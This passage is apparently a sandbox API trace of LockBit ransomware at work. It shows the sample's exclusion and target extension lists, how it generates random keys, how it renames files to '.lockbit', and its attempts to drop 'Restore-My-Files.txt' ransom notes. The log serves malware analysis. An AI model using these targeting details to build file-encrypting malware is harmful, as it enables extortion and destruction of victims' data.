(lpString1=".mod", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.874] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.874] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.875] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105398.WMF") returned 1 [0138.875] lstrcmpiW (lpString1="ntldr", lpString2="J0105398.WMF") returned 1 [0138.875] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105398.WMF") returned 1 [0138.875] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105398.WMF") returned -1 [0138.875] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105398.WMF") returned -1 [0138.875] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105398.WMF") returned 1 [0138.876] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105398.WMF") returned -1 [0138.876] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.876] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF") returned=".WMF" [0138.876] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.876] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.876] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.877] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.877] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.877] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.877] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.877] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.877] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.877] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF.lockbit") returned 72 [0138.877] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105398.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0138.881] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.881] malloc (_Size=0x40068) returned 0x3df0008 [0138.881] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=3328) returned 1 [0138.881] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.882] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0138.882] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.882] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.882] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0138.882] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0138.884] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.884] malloc (_Size=0xa6) returned 0x77d7a8 [0138.884] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.885] free (_Block=0x77d7a8) [0138.885] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105398.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.885] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.885] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.885] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x65e68d90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4fdc, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105410.WMF", cAlternateFileName="")) returned 1 [0138.885] lstrcmpiW (lpString1=".", lpString2="J0105410.WMF") returned -1 [0138.885] lstrcmpiW (lpString1="..", lpString2="J0105410.WMF") returned -1 [0138.885] PathFindExtensionW (pszPath="J0105410.WMF") returned=".WMF" [0138.885] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.885] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.885] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.885] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.885] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.885] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.885] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.885] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.885] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.885] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.886] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.886] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105410.WMF") returned 1 [0138.887] lstrcmpiW (lpString1="ntldr", lpString2="J0105410.WMF") returned 1 [0138.887] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105410.WMF") returned 1 [0138.887] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105410.WMF") returned -1 [0138.887] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105410.WMF") returned -1 [0138.887] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105410.WMF") returned 1 [0138.887] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105410.WMF") returned -1 [0138.887] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.887] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF") returned=".WMF" [0138.887] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.887] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.887] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.888] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.888] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF.lockbit") returned 72 [0138.888] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105410.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x338 [0138.889] CreateIoCompletionPort (FileHandle=0x338, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.889] malloc (_Size=0x40068) returned 0x1ff1e60 [0138.889] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=20444) returned 1 [0138.889] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.889] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0138.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0138.890] ReadFile (in: hFile=0x338, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0138.894] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0138.894] malloc (_Size=0xa6) returned 0x77d7a8 [0138.894] NtSetInformationFile (FileHandle=0x338, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0138.894] free (_Block=0x77d7a8) [0138.894] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105410.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0138.895] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0138.895] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0138.895] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x73d19900, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56347c90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x73d19900, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x24b8, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0105412.WMF", cAlternateFileName="")) returned 1 [0138.895] lstrcmpiW (lpString1=".", lpString2="J0105412.WMF") returned -1 [0138.895] lstrcmpiW (lpString1="..", lpString2="J0105412.WMF") returned -1 [0138.895] PathFindExtensionW (pszPath="J0105412.WMF") returned=".WMF" [0138.895] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0138.895] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0138.896] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0138.896] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0105412.WMF") returned 1 [0138.897] lstrcmpiW (lpString1="ntldr", lpString2="J0105412.WMF") returned 1 [0138.897] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0105412.WMF") returned 1 [0138.897] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0105412.WMF") returned -1 [0138.897] lstrcmpiW (lpString1="autorun.inf", lpString2="J0105412.WMF") returned -1 [0138.897] lstrcmpiW (lpString1="thumbs.db", lpString2="J0105412.WMF") returned 1 [0138.897] lstrcmpiW (lpString1="iconcache.db", lpString2="J0105412.WMF") returned -1 [0138.897] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0138.897] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF") returned=".WMF" [0138.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0138.897] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0138.897] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0138.898] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0138.898] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF.lockbit") returned 72 [0138.898] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0105412.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0105412.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3cc [0138.899] CreateIoCompletionPort (FileHandle=0x3cc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0138.899] malloc (_Size=0x40068) returned 0x3ef0008 [0138.899] GetFileSizeEx (in: hFile=0x3cc, lpFileSize=0x3ef0020 | out: lpFileSize=0x3ef0020*=9400) returned 1 [0138.899] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.899] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0138.900] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3f3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3f3003c) returned 0x0 [0138.900] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0138.900] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 